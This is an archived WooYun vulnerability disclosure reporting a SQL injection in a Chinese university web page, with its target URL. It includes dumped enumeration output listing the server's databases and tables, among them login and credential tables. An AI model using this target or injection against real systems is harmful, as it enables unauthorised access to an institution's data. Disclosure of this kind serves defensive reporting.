乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-20: 细节已通知厂商并且等待厂商处理中 2014-11-25: 厂商已经主动忽略漏洞,细节向公众公开
求邀请码~~~~~~~~~~~
注入点:http://mine.cumt.edu.cn/TM%20system/readnotice.asp?id=42
available databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] works
Database: tempdb[2 tables]+------------------------------------------------+| dbo.sysconstraints || dbo.syssegments |+------------------------------------------------+Database: msdb[77 tables]+------------------------------------------------+| dbo.RTblClassDefs || dbo.RTblDBMProps || dbo.RTblDBXProps || dbo.RTblDTMProps || dbo.RTblDTSProps || dbo.RTblDatabaseVersion || dbo.RTblEQMProps || dbo.RTblEnumerationDef || dbo.RTblEnumerationValueDef || dbo.RTblGENProps || dbo.RTblIfaceDefs || dbo.RTblIfaceHier || dbo.RTblIfaceMem || dbo.RTblMDSProps || dbo.RTblNamedObj || dbo.RTblOLPProps || dbo.RTblParameterDef || dbo.RTblPropDefs || dbo.RTblProps || dbo.RTblRelColDefs || dbo.RTblRelshipDefs || dbo.RTblRelshipProps || dbo.RTblRelships || dbo.RTblSIMProps || dbo.RTblScriptDefs || dbo.RTblSites || dbo.RTblSumInfo || dbo.RTblTFMProps || dbo.RTblTypeInfo || dbo.RTblTypeLibs || dbo.RTblUMLProps || dbo.RTblUMXProps || dbo.RTblVersionAdminInfo || dbo.RTblVersions || dbo.RTblWorkspaceItems || dbo.backupfile || dbo.backupmediafamily || dbo.backupmediaset || dbo.backupset || dbo.log_shipping_primaries || dbo.log_shipping_secondaries || dbo.logmarkhistory || dbo.mswebtasks || dbo.restorefile || dbo.restorefilegroup || dbo.restorehistory || dbo.sqlagent_info || dbo.sysalerts || dbo.syscachedcredentials || dbo.syscategories || dbo.sysconstraints || dbo.sysdbmaintplan_databases || dbo.sysdbmaintplan_history || dbo.sysdbmaintplan_jobs || dbo.sysdbmaintplans || dbo.sysdownloadlist || dbo.sysdtscategories || dbo.sysdtspackagelog || dbo.sysdtspackages || dbo.sysdtssteplog || dbo.sysdtstasklog || dbo.sysjobhistory || dbo.sysjobs || dbo.sysjobs_view || dbo.sysjobschedules || dbo.sysjobservers || dbo.sysjobsteps || dbo.sysnotifications || dbo.sysoperators || dbo.syssegments || dbo.systargetservergroupmembers || dbo.systargetservergroups || dbo.systargetservers || dbo.systargetservers_view || dbo.systaskids || dbo.systasks || dbo.systasks_view |+------------------------------------------------+Database: pubs[14 tables]+------------------------------------------------+| dbo.authors || dbo.discounts || dbo.employee || dbo.jobs || dbo.pub_info || dbo.publishers || dbo.roysched || dbo.sales || dbo.stores || dbo.sysconstraints || dbo.syssegments || dbo.titleauthor || dbo.titles || dbo.titleview |+------------------------------------------------+Database: master[36 tables]+------------------------------------------------+| dbo.INFORMATION_SCHEMA.CHECK_CONSTRAINTS || dbo.INFORMATION_SCHEMA.COLUMNS || dbo.INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || dbo.INFORMATION_SCHEMA.COLUMN_PRIVILEGES || dbo.INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || dbo.INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || dbo.INFORMATION_SCHEMA.DOMAINS || dbo.INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || dbo.INFORMATION_SCHEMA.KEY_COLUMN_USAGE || dbo.INFORMATION_SCHEMA.PARAMETERS || dbo.INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || dbo.INFORMATION_SCHEMA.ROUTINES || dbo.INFORMATION_SCHEMA.ROUTINE_COLUMNS || dbo.INFORMATION_SCHEMA.SCHEMATA || dbo.INFORMATION_SCHEMA.TABLES || dbo.INFORMATION_SCHEMA.TABLE_CONSTRAINTS || dbo.INFORMATION_SCHEMA.TABLE_PRIVILEGES || dbo.INFORMATION_SCHEMA.VIEWS || dbo.INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || dbo.INFORMATION_SCHEMA.VIEW_TABLE_USAGE || dbo.MSreplication_options || dbo.spt_datatype_info || dbo.spt_datatype_info_ext || dbo.spt_fallback_db || dbo.spt_fallback_dev || dbo.spt_fallback_usg || dbo.spt_monitor || dbo.spt_provider_types || dbo.spt_server_info || dbo.spt_values || dbo.sysconstraints || dbo.syslogins || dbo.sysoledbusers || dbo.sysopentapes || dbo.sysremotelogins || dbo.syssegments |+------------------------------------------------+Database: model[2 tables]+------------------------------------------------+| dbo.sysconstraints || dbo.syssegments |+------------------------------------------------+Database: works[31 tables]+------------------------------------------------+| dbo.DIY_TEMPCOMMAND_TABLE || dbo.Sheet2$ || dbo.[?????] || dbo.[????????] || dbo.[????????] || dbo.[?????] || dbo.[?????????1] || dbo.[?????????] || dbo.[??] || dbo.[???] || dbo.[????] || dbo.[???????] || dbo.[??????D99_Tmp] || dbo.[???] || dbo.[?????] || dbo.[???] || dbo.[?????\xbd??\xbc] || dbo.[???] || dbo.[???????] || dbo.[?????] || dbo.[??????] || dbo.[????????] || dbo.basicconfig || dbo.diy_temptalble || dbo.dtproperties || dbo.exam_news || dbo.notice || dbo.sendmessage || dbo.sysconstraints || dbo.syssegments || dbo.video |+------------------------------------------------+Database: Northwind[31 tables]+------------------------------------------------+| dbo.Categories || dbo.CustomerCustomerDemo || dbo.CustomerDemographics || dbo.Customers || dbo.EmployeeTerritories || dbo.Employees || dbo.Invoices || dbo.Orders || dbo.Products || dbo.Region || dbo.Shippers || dbo.Suppliers || dbo.Territories || dbo.[Alphabetical list of products] || dbo.[Category Sales for 1997] || dbo.[Current Product List] || dbo.[Customer and Suppliers by City] || dbo.[Order Details Extended] || dbo.[Order Details] || dbo.[Order Subtotals] || dbo.[Orders Qry] || dbo.[Product Sales for 1997] || dbo.[Products Above Average Price] || dbo.[Products by Category] || dbo.[Quarterly Orders] || dbo.[Sales Totals by Amount] || dbo.[Sales by Category] || dbo.[Summary of Sales by Quarter] || dbo.[Summary of Sales by Year] || dbo.sysconstraints || dbo.syssegments |+------------------------------------------------+
过滤参数
危害等级:无影响厂商忽略
忽略时间:2014-11-25 18:40
暂无